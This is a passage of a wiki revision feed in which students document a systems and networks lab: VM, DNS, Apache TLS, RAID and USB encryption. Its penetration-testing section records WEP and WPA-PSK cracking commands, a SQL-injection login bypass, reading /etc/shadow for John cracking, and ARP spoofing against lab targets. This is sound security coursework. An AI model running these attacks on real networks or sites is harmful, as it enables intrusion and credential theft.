Il est nécessaire de renseigner l'adresse du serveur mail dans le fichier DNS /etc/bind/db.morillon.website&lt;br /&gt;
    @     IN    MX 100 mail&lt;br /&gt;
    mail  IN    CNAME ns1&lt;br /&gt;
    ns1   IN    A   *adresse ip publique*&lt;br /&gt;
&lt;br /&gt;
Grâce à&lt;br /&gt;
    mailx&lt;br /&gt;
&lt;br /&gt;
Nous pouvons vérifier la présence de mail sur notre serveur et recevoir la demande d'authentification de gandi pour générer le certificat.&lt;br /&gt;
&lt;br /&gt;
Une fois obtenue, nous avons 4 fichiers : .key (fichier private key) .csr (fichier certificate) .crt (certificat signé) et .pem (liste des certificats accordés aux autorités signant notre certificat)&lt;br /&gt;
&lt;br /&gt;
Nous configurons par la suite apache2 pour utiliser ces certificats, dans le terminal :&lt;br /&gt;
    a2enmod ssl&lt;br /&gt;
    a2enmod headers&lt;br /&gt;
    service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Maintenant, nous créons un fichier de configuration pour notre serveur:&lt;br /&gt;
    touch /etc/apache2/sites-available/morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
Contenant :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         Redirect permanent / https://www.morillon.website&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
    #Pour rediriger automatiquement les connexions http vers https&lt;br /&gt;
    &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
        ServerName morillon.website&lt;br /&gt;
        ServerAlias www.morillon.website&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/morillon.website&amp;quot;&lt;br /&gt;
         &amp;lt;Directory &amp;quot;var/www/morillon.website&amp;quot;&amp;gt;&lt;br /&gt;
            Options +FollowSymLinks&lt;br /&gt;
            AllowOverride all&lt;br /&gt;
            Require all granted&lt;br /&gt;
         &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.morillon.website.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.morillon.website.log combined&lt;br /&gt;
        #Paramètres de base pour notre site&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile &amp;quot;/home/certificates/morillon.website.crt&amp;quot;&lt;br /&gt;
        SSLCertificateKeyFile &amp;quot;/home/certificates/morillon.key&amp;quot;&lt;br /&gt;
        SSLCertificateChainFile &amp;quot;/home/certificates/GandiStandardSSLCA2.pem&amp;quot;&lt;br /&gt;
        #Activation de la sécurité TLS, emplacement des certificats, de la clé privée et des listes de certificats intermédiaires&lt;br /&gt;
        SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2&lt;br /&gt;
        SSLHonorCipherOrder On&lt;br /&gt;
        SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:HIGH:!MD5:!aNULL:!EDH:!RC4&lt;br /&gt;
        SSLCompression off&lt;br /&gt;
        #Quelques options de sécurité supplémentaires suites aux découvertes sur les failles TLS de 2014&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous avons désactivé les autres sites par défaut :&lt;br /&gt;
    a2dissite 000-default.conf&lt;br /&gt;
    a2dissite default-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Et activons notre site:&lt;br /&gt;
    a2ensite morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
===Raid 5 Logiciel===&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le raid 5 logiciel, on crée tout d'abord 3 partitions virtuelles via lvcreate:&lt;br /&gt;
    lvcreate -L1G -n JDDTTR5* storage&lt;br /&gt;
&lt;br /&gt;
Ensuite on les lie à la VM dans le fichier /etc/xen/morillon.cfg comme pour les disques home et var.&lt;br /&gt;
&lt;br /&gt;
Après redémarrage de la VM, on installe le paquet mdadm et on crée un raid 5 sur les 3 nouvelles partitions :&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvde /dev/xvdf /dev/xvdg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier la création grâce à :&lt;br /&gt;
    cat /proc/mdstat&lt;br /&gt;
 &lt;br /&gt;
qui nous renvoie :&lt;br /&gt;
    Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
    md0 : active raid5 xvdg[3] xvdf[1] xvde[0]&lt;br /&gt;
         2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54152</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54152"/>
				<updated>2020-11-30T16:44:30Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
==== Intrusion sur un serveur d’application Web ====&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Brute-force sur WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
Pour commencer, la carte passe en mode monitor :&lt;br /&gt;
    airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Puis une analyse des réseaux wifi disponible est effectuée :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On sélectionne notre réseau wifi (ici kracotte 6) avec son adresse MAC&lt;br /&gt;
    airodump-ng -c 3 --bssid 00:14:1B:60:8C:25 -w /home/pifou/Desktop/kracotte6 wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Handshaked_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Lorsque le handshake est obtenu, on compare grâce à un dictionnaire et la commande le fichier .cap récupéré: &lt;br /&gt;
     aicrack-ng -a2 -b 00:14:1B:60:8C:25 -w dico.txt kracotte06-02.cap&lt;br /&gt;
&lt;br /&gt;
Pour créer le dictionnaire, on utilise la commande crunch (comme on sait que le mot de passe est sur 8 caractères et forcément un nombre)&lt;br /&gt;
    crunch 8 8 0123456789 -o ./dico.txt&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_working_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Finalement, après un peu moins d'1h d'attente :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_done_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
==== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ====&lt;br /&gt;
Dans cette partie nous allons effectuer une attaque de type &amp;quot;homme du milieu&amp;quot; en faisant passé notre ordinateur pour la passerelle.&lt;br /&gt;
&lt;br /&gt;
Nous l'avons réalisé en ces étapes :&lt;br /&gt;
 1. Installation du paquetage dsniff sur notre ordinateur &lt;br /&gt;
 2. Modification du fichier /proc/sys/net/ipv4/ip_forward à 1&lt;br /&gt;
 3. Dans le terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 4. Dans un autre terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 5. Ouverture de wireshark sur l'eeepc et filtrage des paquets capturés sur le type hit&lt;br /&gt;
 6. Ouverture d'un site http (http://fabricarium.polytech-lille.fr)&lt;br /&gt;
 7. Observation sur wireshark des paquets (méthode GET)&lt;br /&gt;
 8. En essayant de nous connecter en remplissant les identifiants, nous avons eu ce résultat :&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour accéder via ssh à la machine, il suffit de s'y connecter via les identifiants habituels.&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MàJ du 16/11:&lt;br /&gt;
&lt;br /&gt;
Après vérification, une erreur de type couillon sur le glue record a probablement empêché le bon déroulement de l'opération : l'adresse ip renseignée était 193.57.48.183 au lieu de 193.48.57.183...&lt;br /&gt;
&lt;br /&gt;
MàJ du 30/11:&lt;br /&gt;
&lt;br /&gt;
Migration réussie&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
Une fois le .csr et le .key créés, nous transmettons à gandi.net le CSR afin de générer un certificat signé.&lt;br /&gt;
&lt;br /&gt;
Nous avons configué notre serveur pour recevoir des mails, pour cela, nous avons installé 2 paquets :&lt;br /&gt;
&lt;br /&gt;
    postfix&lt;br /&gt;
    bsd-mailx&lt;br /&gt;
&lt;br /&gt;
Puis nous avons ajouté un alias dans le fichier /etc/aliases&lt;br /&gt;
    admin:     root&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de renseigner l'adresse du serveur mail dans le fichier DNS /etc/bind/db.morillon.website&lt;br /&gt;
    @     IN    MX 100 mail&lt;br /&gt;
    mail  IN    CNAME ns1&lt;br /&gt;
    ns1   IN    A   *adresse ip publique*&lt;br /&gt;
&lt;br /&gt;
Grâce à&lt;br /&gt;
    mailx&lt;br /&gt;
&lt;br /&gt;
Nous pouvons vérifier la présence de mail sur notre serveur et recevoir la demande d'authentification de gandi pour générer le certificat.&lt;br /&gt;
&lt;br /&gt;
Une fois obtenue, nous avons 4 fichiers : .key (fichier private key) .csr (fichier certificate) .crt (certificat signé) et .pem (liste des certificats accordés aux autorités signant notre certificat)&lt;br /&gt;
&lt;br /&gt;
Nous configurons par la suite apache2 pour utiliser ces certificats, dans le terminal :&lt;br /&gt;
    a2enmod ssl&lt;br /&gt;
    a2enmod headers&lt;br /&gt;
    service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Maintenant, nous créons un fichier de configuration pour notre serveur:&lt;br /&gt;
    touch /etc/apache2/sites-available/morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
Contenant :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         Redirect permanent / https://www.morillon.website&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
    #Pour rediriger automatiquement les connexions http vers https&lt;br /&gt;
    &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
        ServerName morillon.website&lt;br /&gt;
        ServerAlias www.morillon.website&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/morillon.website&amp;quot;&lt;br /&gt;
         &amp;lt;Directory &amp;quot;var/www/morillon.website&amp;quot;&amp;gt;&lt;br /&gt;
            Options +FollowSymLinks&lt;br /&gt;
            AllowOverride all&lt;br /&gt;
            Require all granted&lt;br /&gt;
         &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.morillon.website.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.morillon.website.log combined&lt;br /&gt;
        #Paramètres de base pour notre site&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile &amp;quot;/home/certificates/morillon.website.crt&amp;quot;&lt;br /&gt;
        SSLCertificateKeyFile &amp;quot;/home/certificates/morillon.key&amp;quot;&lt;br /&gt;
        SSLCertificateChainFile &amp;quot;/home/certificates/GandiStandardSSLCA2.pem&amp;quot;&lt;br /&gt;
        #Activation de la sécurité TLS, emplacement des certificats, de la clé privée et des listes de certificats intermédiaires&lt;br /&gt;
        SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2&lt;br /&gt;
        SSLHonorCipherOrder On&lt;br /&gt;
        SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:HIGH:!MD5:!aNULL:!EDH:!RC4&lt;br /&gt;
        SSLCompression off&lt;br /&gt;
        #Quelques options de sécurité supplémentaires suites aux découvertes sur les failles TLS de 2014&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous avons désactivé les autres sites par défaut :&lt;br /&gt;
    a2dissite 000-default.conf&lt;br /&gt;
    a2dissite default-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Et activons notre site:&lt;br /&gt;
    a2ensite morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
===Raid 5 Logiciel===&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le raid 5 logiciel, on crée tout d'abord 3 partitions virtuelles via lvcreate:&lt;br /&gt;
    lvcreate -L1G -n JDDTTR5* storage&lt;br /&gt;
&lt;br /&gt;
Ensuite on les lie à la VM dans le fichier /etc/xen/morillon.cfg comme pour les disques home et var.&lt;br /&gt;
&lt;br /&gt;
Après redémarrage de la VM, on installe le paquet mdadm et on crée un raid 5 sur les 3 nouvelles partitions :&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvde /dev/xvdf /dev/xvdg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier la création grâce à :&lt;br /&gt;
    cat /proc/mdstat&lt;br /&gt;
 &lt;br /&gt;
qui nous renvoie :&lt;br /&gt;
    Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
    md0 : active raid5 xvdg[3] xvdf[1] xvde[0]&lt;br /&gt;
         2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53739</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53739"/>
				<updated>2020-11-16T15:44:52Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
* Cassage de clef WEP d'un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
*  Intrusion sur un serveur d’application Web&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
